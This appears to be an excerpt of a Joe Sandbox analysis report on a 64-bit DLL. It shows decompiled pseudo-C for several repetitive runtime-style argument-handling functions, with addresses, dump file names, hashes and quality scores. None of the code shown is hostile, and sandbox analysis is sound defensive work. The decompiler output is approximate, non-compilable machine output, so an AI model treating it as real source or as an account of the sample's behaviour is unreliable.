                                                                      				if ( *_t72 != 0) goto 0x80019966;
                                                                      				 *_t72 = 2;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x800199ba;
                                                                      				_v24 = _t44;
                                                                      				r8d = 2;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800247DC(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001995e;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80019961;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x1800198c0
                                                                      0x1800198d1
                                                                      0x1800198d4
                                                                      0x1800198d6
                                                                      0x1800198db
                                                                      0x1800198e3
                                                                      0x1800198e6
                                                                      0x1800198f5
                                                                      0x1800198f7
                                                                      0x1800198fd
                                                                      0x180019900
                                                                      0x180019905
                                                                      0x180019909
                                                                      0x180019910
                                                                      0x180019916
                                                                      0x18001991b
                                                                      0x180019920
                                                                      0x180019927
                                                                      0x180019937
                                                                      0x180019939
                                                                      0x180019943
                                                                      0x180019947
                                                                      0x18001994f
                                                                      0x180019951
                                                                      0x180019957
                                                                      0x18001995b
                                                                      0x18001995e
                                                                      0x180019964
                                                                      0x180019966
                                                                      0x18001996a
                                                                      0x180019970
                                                                      0x18001997a
                                                                      0x18001997c
                                                                      0x180019980
                                                                      0x180019983
                                                                      0x18001998a
                                                                      0x18001998e
                                                                      0x180019995
                                                                      0x180019999
                                                                      0x18001999e
                                                                      0x1800199a3
                                                                      0x1800199a8
                                                                      0x1800199b5
                                                                      0x1800199c4

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7a2242ff16dcbabafc54308690846610162e116e8a71540af0e692c8b4d99106
                                                                      • Instruction ID: 1231f4d84e47523f4d61577e74a6bc0401b946f968506cf2e2c9a61d51169eac
                                                                      • Opcode Fuzzy Hash: 7a2242ff16dcbabafc54308690846610162e116e8a71540af0e692c8b4d99106
                                                                      • Instruction Fuzzy Hash: 2131A272205B88C6EB618F69E0503AD7BA0F38DF88F248129EB8D0B755CF3AC156C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180017908(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80017934;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x0000ffff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80017a01;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80017975;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x80017a03;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x800179f3;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x800179af;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x80017a03;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E000000011800247DC(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x800179a7;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x800179aa;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x180017908
                                                                      0x180017908
                                                                      0x180017919
                                                                      0x18001791c
                                                                      0x18001791e
                                                                      0x180017923
                                                                      0x180017927
                                                                      0x18001792c
                                                                      0x18001792f
                                                                      0x18001793e
                                                                      0x180017940
                                                                      0x180017946
                                                                      0x180017949
                                                                      0x18001794e
                                                                      0x180017952
                                                                      0x180017959
                                                                      0x18001795f
                                                                      0x180017964
                                                                      0x180017969
                                                                      0x180017970
                                                                      0x180017980
                                                                      0x180017982
                                                                      0x18001798c
                                                                      0x180017990
                                                                      0x180017998
                                                                      0x18001799a
                                                                      0x1800179a0
                                                                      0x1800179a4
                                                                      0x1800179a7
                                                                      0x1800179ad
                                                                      0x1800179af
                                                                      0x1800179b3
                                                                      0x1800179c3
                                                                      0x1800179c5
                                                                      0x1800179c9
                                                                      0x1800179cc
                                                                      0x1800179d3
                                                                      0x1800179d7
                                                                      0x1800179de
                                                                      0x1800179e2
                                                                      0x1800179e7
                                                                      0x1800179ec
                                                                      0x1800179f1
                                                                      0x1800179fe
                                                                      0x180017a0d

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95eb831a8ac7cfc1b9beaf9c737d358fda2ed46ef664a3ac556a25dbae9418e6
                                                                      • Instruction ID: 7cf498833437a00c94dba9625ced1d8b041eea2fc301f29416f2ca0de7f060c9
                                                                      • Opcode Fuzzy Hash: 95eb831a8ac7cfc1b9beaf9c737d358fda2ed46ef664a3ac556a25dbae9418e6
                                                                      • Instruction Fuzzy Hash: CB319172215B94C6DBA18F29D0403AD7BA1F38DB8CF648125EB8C4B752CF36C59ACB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E000000011800199C8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800199f3;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80019ac2;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80019a34;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80019ac4;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80019ab4;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80019a70;
                                                                      				 *_t71 = 2;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80019ac4;
                                                                      				_v24 = _t43;
                                                                      				r8d = 2;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024A10(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80019a68;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80019a6b;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x1800199c8
                                                                      0x1800199d9
                                                                      0x1800199dc
                                                                      0x1800199de
                                                                      0x1800199e3
                                                                      0x1800199eb
                                                                      0x1800199ee
                                                                      0x1800199fd
                                                                      0x1800199ff
                                                                      0x180019a05
                                                                      0x180019a08
                                                                      0x180019a0d
                                                                      0x180019a11
                                                                      0x180019a18
                                                                      0x180019a1e
                                                                      0x180019a23
                                                                      0x180019a28
                                                                      0x180019a2f
                                                                      0x180019a3f
                                                                      0x180019a41
                                                                      0x180019a4b
                                                                      0x180019a50
                                                                      0x180019a58
                                                                      0x180019a5a
                                                                      0x180019a60
                                                                      0x180019a65
                                                                      0x180019a68
                                                                      0x180019a6e
                                                                      0x180019a70
                                                                      0x180019a74
                                                                      0x180019a7a
                                                                      0x180019a84
                                                                      0x180019a86
                                                                      0x180019a8a
                                                                      0x180019a8d
                                                                      0x180019a94
                                                                      0x180019a98
                                                                      0x180019a9f
                                                                      0x180019aa3
                                                                      0x180019aa8
                                                                      0x180019aad
                                                                      0x180019ab2
                                                                      0x180019abf
                                                                      0x180019ace

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4cb1b57cabdf7c96151d309148b507424f2973327cb8fd69934bbf46bd6256c9
                                                                      • Instruction ID: 152ae7fce4956eacef058b7557dce80bfb4f5108cd07920b4a51c8638f13ec58
                                                                      • Opcode Fuzzy Hash: 4cb1b57cabdf7c96151d309148b507424f2973327cb8fd69934bbf46bd6256c9
                                                                      • Instruction Fuzzy Hash: 1B319172205B88C6DB658F29E0413AD77A4F78CF88F648125EB8D4B751DF36C15ACB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180017A10(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80017a3c;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x0000ffff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80017b0b;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80017a7d;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x80017b0d;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80017afd;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80017ab9;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80017b0d;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180024A10(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x80017ab1;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x80017ab4;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180017a10
                                                                      0x180017a10
                                                                      0x180017a21
                                                                      0x180017a24
                                                                      0x180017a26
                                                                      0x180017a2b
                                                                      0x180017a2f
                                                                      0x180017a34
                                                                      0x180017a37
                                                                      0x180017a46
                                                                      0x180017a48
                                                                      0x180017a4e
                                                                      0x180017a51
                                                                      0x180017a56
                                                                      0x180017a5a
                                                                      0x180017a61
                                                                      0x180017a67
                                                                      0x180017a6c
                                                                      0x180017a71
                                                                      0x180017a78
                                                                      0x180017a88
                                                                      0x180017a8a
                                                                      0x180017a94
                                                                      0x180017a99
                                                                      0x180017aa1
                                                                      0x180017aa3
                                                                      0x180017aa9
                                                                      0x180017aae
                                                                      0x180017ab1
                                                                      0x180017ab7
                                                                      0x180017ab9
                                                                      0x180017abd
                                                                      0x180017acd
                                                                      0x180017acf
                                                                      0x180017ad3
                                                                      0x180017ad6
                                                                      0x180017add
                                                                      0x180017ae1
                                                                      0x180017ae8
                                                                      0x180017aec
                                                                      0x180017af1
                                                                      0x180017af6
                                                                      0x180017afb
                                                                      0x180017b08
                                                                      0x180017b17

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 513ea7ffc1e4bb1d9c271f044e7188771ee25110b2ff80e6a71db9fe7e526689
                                                                      • Instruction ID: 865f2309294c1b74c404b91618325ba8764d153117983fb6bc66aac10fb231cc
                                                                      • Opcode Fuzzy Hash: 513ea7ffc1e4bb1d9c271f044e7188771ee25110b2ff80e6a71db9fe7e526689
                                                                      • Instruction Fuzzy Hash: F1319372214A58C6DBA58F19E0803AD77B0F788B8CF648115EB4C4B751DF36C696CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180019AD0(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019afb;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80019bca;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80019b3c;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80019bcc;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80019bbc;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80019b78;
                                                                      				 *_t71 = 2;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80019bcc;
                                                                      				_v24 = _t43;
                                                                      				r8d = 2;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024C14(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80019b70;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80019b73;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180019ad0
                                                                      0x180019ae1
                                                                      0x180019ae4
                                                                      0x180019ae6
                                                                      0x180019aeb
                                                                      0x180019af3
                                                                      0x180019af6
                                                                      0x180019b05
                                                                      0x180019b07
                                                                      0x180019b0d
                                                                      0x180019b10
                                                                      0x180019b15
                                                                      0x180019b19
                                                                      0x180019b20
                                                                      0x180019b26
                                                                      0x180019b2b
                                                                      0x180019b30
                                                                      0x180019b37
                                                                      0x180019b47
                                                                      0x180019b49
                                                                      0x180019b53
                                                                      0x180019b58
                                                                      0x180019b60
                                                                      0x180019b62
                                                                      0x180019b68
                                                                      0x180019b6d
                                                                      0x180019b70
                                                                      0x180019b76
                                                                      0x180019b78
                                                                      0x180019b7c
                                                                      0x180019b82
                                                                      0x180019b8c
                                                                      0x180019b8e
                                                                      0x180019b92
                                                                      0x180019b95
                                                                      0x180019b9c
                                                                      0x180019ba0
                                                                      0x180019ba7
                                                                      0x180019bab
                                                                      0x180019bb0
                                                                      0x180019bb5
                                                                      0x180019bba
                                                                      0x180019bc7
                                                                      0x180019bd6

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 773afe857da011a50a5447c9e3415a61d8af3fd091879273027c957fb4841997
                                                                      • Instruction ID: ecc24380a6bcc6a454f7ed627f6182442e94c06d5c63b46d51c8a4d473287393
                                                                      • Opcode Fuzzy Hash: 773afe857da011a50a5447c9e3415a61d8af3fd091879273027c957fb4841997
                                                                      • Instruction Fuzzy Hash: F231A272609B48C6DBA58F69E1813AD77A0F39CB88F648125EB8D0B751CF36C596C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180017B18(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				signed int _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t64;
                                                                      				intOrPtr _t67;
                                                                      				signed int* _t71;
                                                                      				signed int _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_t78 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80017b44;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t67 - 8) & 0x0000ffff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80017c13;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80017b85;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t58, __rcx, _t67, __rdx, _t73, _t74, __r8);
                                                                      				goto 0x80017c15;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80017c05;
                                                                      				_t44 =  *(_t67 + 0x34);
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80017bc1;
                                                                      				 *_t71 = 1;
                                                                      				_t71[1] = r9w;
                                                                      				_t71[4] = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80017c15;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				if (E00000001180024C14(_t64, _t64, _t71, _t73, _t79) != 0) goto 0x80017bb9;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t62, _t64, _t64, _t71, _t73, _t74, _t78);
                                                                      				goto 0x80017bbc;
                                                                      				 *_t71 = _t62;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180017b18
                                                                      0x180017b18
                                                                      0x180017b29
                                                                      0x180017b2c
                                                                      0x180017b2e
                                                                      0x180017b33
                                                                      0x180017b37
                                                                      0x180017b3c
                                                                      0x180017b3f
                                                                      0x180017b4e
                                                                      0x180017b50
                                                                      0x180017b56
                                                                      0x180017b59
                                                                      0x180017b5e
                                                                      0x180017b62
                                                                      0x180017b69
                                                                      0x180017b6f
                                                                      0x180017b74
                                                                      0x180017b79
                                                                      0x180017b80
                                                                      0x180017b90
                                                                      0x180017b92
                                                                      0x180017b9c
                                                                      0x180017ba1
                                                                      0x180017ba9
                                                                      0x180017bab
                                                                      0x180017bb1
                                                                      0x180017bb6
                                                                      0x180017bb9
                                                                      0x180017bbf
                                                                      0x180017bc1
                                                                      0x180017bc5
                                                                      0x180017bd5
                                                                      0x180017bd7
                                                                      0x180017bdb
                                                                      0x180017bde
                                                                      0x180017be5
                                                                      0x180017be9
                                                                      0x180017bf0
                                                                      0x180017bf4
